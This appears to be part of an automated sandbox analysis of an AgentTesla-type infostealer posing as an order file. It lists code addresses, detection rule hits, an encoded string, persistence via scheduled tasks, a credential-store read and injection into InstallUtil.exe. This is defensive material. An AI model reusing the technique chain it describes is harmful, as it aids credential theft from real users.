                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F286900_2_06F28690
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F2C3000_2_06F2C300
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F286870_2_06F28687
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F2C6270_2_06F2C627
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F200400_2_06F20040
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F200060_2_06F20006
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F291100_2_06F29110
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F291000_2_06F29100
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F2D9060_2_06F2D906
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F3FA600_2_06F3FA60
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F3A0100_2_06F3A010
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F3FE1E0_2_06F3FE1E
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F3FA4F0_2_06F3FA4F
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06FF0C450_2_06FF0C45
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06FF4DF80_2_06FF4DF8
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06FF59200_2_06FF5920
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06FF2A180_2_06FF2A18
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06FF2A0B0_2_06FF2A0B
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06FF4DE90_2_06FF4DE9
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06FF59100_2_06FF5910
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_0724D7980_2_0724D798
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_0724CB280_2_0724CB28
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_0723003D0_2_0723003D
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_072300400_2_07230040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D41902_2_012D4190
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D4A602_2_012D4A60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D9C682_2_012D9C68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012DCF282_2_012DCF28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D3E482_2_012D3E48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05B3AF182_2_05B3AF18
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05B394082_2_05B39408
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_0131F6B04_2_0131F6B0
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_0131D6C44_2_0131D6C4
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_069E37304_2_069E3730
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_069EE4D04_2_069EE4D0
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_069E5D624_2_069E5D62
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_069E71744_2_069E7174
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_069E9E174_2_069E9E17
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_069E9E284_2_069E9E28
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_069ECF904_2_069ECF90
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_069ED7084_2_069ED708
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_069E37204_2_069E3720
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_069E8C784_2_069E8C78
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_069E8C684_2_069E8C68
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_069E00284_2_069E0028
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_069E00404_2_069E0040
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B242C04_2_06B242C0
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B2A1984_2_06B2A198
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B242B04_2_06B242B0
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B212E04_2_06B212E0
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B212D24_2_06B212D2
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B2A2284_2_06B2A228
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B2A1884_2_06B2A188
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B386904_2_06B38690
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B3C3004_2_06B3C300
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B386864_2_06B38686
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B3C6274_2_06B3C627
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B300064_2_06B30006
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B300404_2_06B30040
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B391104_2_06B39110
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B391004_2_06B39100
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B4FA604_2_06B4FA60
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B4CC304_2_06B4CC30
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B4FA4F4_2_06B4FA4F
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B4A0F84_2_06B4A0F8
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06BB00064_2_06BB0006
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06BB00404_2_06BB0040
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06C03E084_2_06C03E08
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06C049304_2_06C04930
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06C08ADA4_2_06C08ADA
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06C087474_2_06C08747
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06C03DFB4_2_06C03DFB
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06C0491F4_2_06C0491F
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06E5D7984_2_06E5D798
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06E5CB284_2_06E5CB28
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06E400404_2_06E40040
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06E400394_2_06E40039
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_01634A605_2_01634A60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_01639C625_2_01639C62
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0163CF285_2_0163CF28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_01633E485_2_01633E48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_016341905_2_01634190
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_066956A85_2_066956A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_066900405_2_06690040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06692EE85_2_06692EE8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06693F205_2_06693F20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669BCC05_2_0669BCC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06699A985_2_06699A98
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06698B535_2_06698B53
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669DBF05_2_0669DBF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669361B5_2_0669361B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06694FC85_2_06694FC8
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_0160F6B06_2_0160F6B0
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_0160D6C46_2_0160D6C4
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_0160F6A26_2_0160F6A2
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06A837306_2_06A83730
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06A8E4D06_2_06A8E4D0
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06A85D626_2_06A85D62
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06A871746_2_06A87174
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06A89E286_2_06A89E28
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06A8CF906_2_06A8CF90
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06A837206_2_06A83720
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06A8D7086_2_06A8D708
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06A88C786_2_06A88C78
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06A800066_2_06A80006
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06A800406_2_06A80040
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BC42C06_2_06BC42C0
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BCA1986_2_06BCA198
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BC42B06_2_06BC42B0
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BC12E06_2_06BC12E0
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BC12D36_2_06BC12D3
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BCA2286_2_06BCA228
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BCA1886_2_06BCA188
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BD86906_2_06BD8690
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BDC2F06_2_06BDC2F0
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BD86826_2_06BD8682
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BDC6276_2_06BDC627
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BD00066_2_06BD0006
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BD00406_2_06BD0040
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BD91106_2_06BD9110
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BD91006_2_06BD9100
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BDD9086_2_06BDD908
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BEFA606_2_06BEFA60
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BEFE1E6_2_06BEFE1E
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BEFA4F6_2_06BEFA4F
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BEA0F86_2_06BEA0F8
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06C500406_2_06C50040
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06C5003E6_2_06C5003E
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06CA3E086_2_06CA3E08
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06CA49306_2_06CA4930
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06CA8ADA6_2_06CA8ADA
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06CA87476_2_06CA8747
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06CA3DF96_2_06CA3DF9
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06CA491F6_2_06CA491F
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06EFD7986_2_06EFD798
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06EFCB286_2_06EFCB28
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06EE00406_2_06EE0040
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06EE00066_2_06EE0006
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_014C4A607_2_014C4A60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_014C9C627_2_014C9C62
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_014CCF287_2_014CCF28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_014C3E487_2_014C3E48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_014C41907_2_014C4190
                    Source: GEFA-Order 232343-68983689.exeBinary or memory string: OriginalFilename vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000043AA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1388363679.000000000136E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1408943275.0000000006C10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameYmvjoijhcv.dll" vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.0000000004201000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameYmvjoijhcv.dll" vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.0000000004201000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1409541914.0000000006D80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.0000000004420000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1389741733.0000000003483000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameYmvjoijhcv.dll" vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1389741733.00000000033BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1389741733.00000000033BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePrlwiygeyof.exe8 vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1389741733.0000000003252000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000000.1332685429.0000000000F72000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePrlwiygeyof.exe8 vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1410426662.0000000006F50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1408089923.0000000005BA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePrlwiygeyof.exe8 vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exeBinary or memory string: OriginalFilenamePrlwiygeyof.exe8 vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: GEFA-Order 232343-68983689.exe, -.csCryptographic APIs: 'CreateDecryptor'
                    Source: GEFA-Order 232343-68983689.exe, Fjvoeakus.csCryptographic APIs: 'CreateDecryptor'
                    Source: Fqhnalw.exe.0.dr, -.csCryptographic APIs: 'CreateDecryptor'
                    Source: Fqhnalw.exe.0.dr, Fjvoeakus.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, JxjTJsLcVMlWTHfxdv2.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, JxjTJsLcVMlWTHfxdv2.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, JxjTJsLcVMlWTHfxdv2.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, JxjTJsLcVMlWTHfxdv2.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.435a4d8.4.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.435a4d8.4.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.435a4d8.4.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.435a4d8.4.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: GEFA-Order 232343-68983689.exe, -.csBase64 encoded string: 'uvSesxFpx9+IoRhhivmEqBoqqP6eohlmhfTWgBFwrOOZtQ1Fmv6IqhZokLaKogBbr/iBqzplhOjWqARboOOItgFlheSZvk9jjPmyixFqjvmF/DNhndmUtxFCm+KAjxVqjeGI/BNhndKjphlh0sSDoxF8puvWlRFljd6ZtR1qjrasoxA/juiZmCRrmuSZrhtq0uqIsytHnP+fohpwreKAph1q0t6IszBlnezW9EQz0bjWhgd3jOCPqw1XjP+bogY/uuSAtxhhqP6eohlmhfSovwRohv+ItU9miO+IqwJp0v6AqB9hneiesw=='
                    Source: Fqhnalw.exe.0.dr, -.csBase64 encoded string: 'uvSesxFpx9+IoRhhivmEqBoqqP6eohlmhfTWgBFwrOOZtQ1Fmv6IqhZokLaKogBbr/iBqzplhOjWqARboOOItgFlheSZvk9jjPmyixFqjvmF/DNhndmUtxFCm+KAjxVqjeGI/BNhndKjphlh0sSDoxF8puvWlRFljd6ZtR1qjrasoxA/juiZmCRrmuSZrhtq0uqIsytHnP+fohpwreKAph1q0t6IszBlnezW9EQz0bjWhgd3jOCPqw1XjP+bogY/uuSAtxhhqP6eohlmhfSovwRohv+ItU9miO+IqwJp0v6AqB9hneiesw=='
                    Source: 0.2.GEFA-Order 232343-68983689.exe.435a4d8.4.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.GEFA-Order 232343-68983689.exe.435a4d8.4.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.GEFA-Order 232343-68983689.exe.435a4d8.4.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.GEFA-Order 232343-68983689.exe.435a4d8.4.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.GEFA-Order 232343-68983689.exe.435a4d8.4.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.GEFA-Order 232343-68983689.exe.435a4d8.4.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@2/2
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeFile created: C:\Users\user\AppData\Roaming\Fqhnalw.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                    Source: GEFA-Order 232343-68983689.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: GEFA-Order 232343-68983689.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: GEFA-Order 232343-68983689.exeReversingLabs: Detection: 21%
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeFile read: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe "C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe"
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Fqhnalw.exe "C:\Users\user\AppData\Roaming\Fqhnalw.exe"
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Fqhnalw.exe "C:\Users\user\AppData\Roaming\Fqhnalw.exe"
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
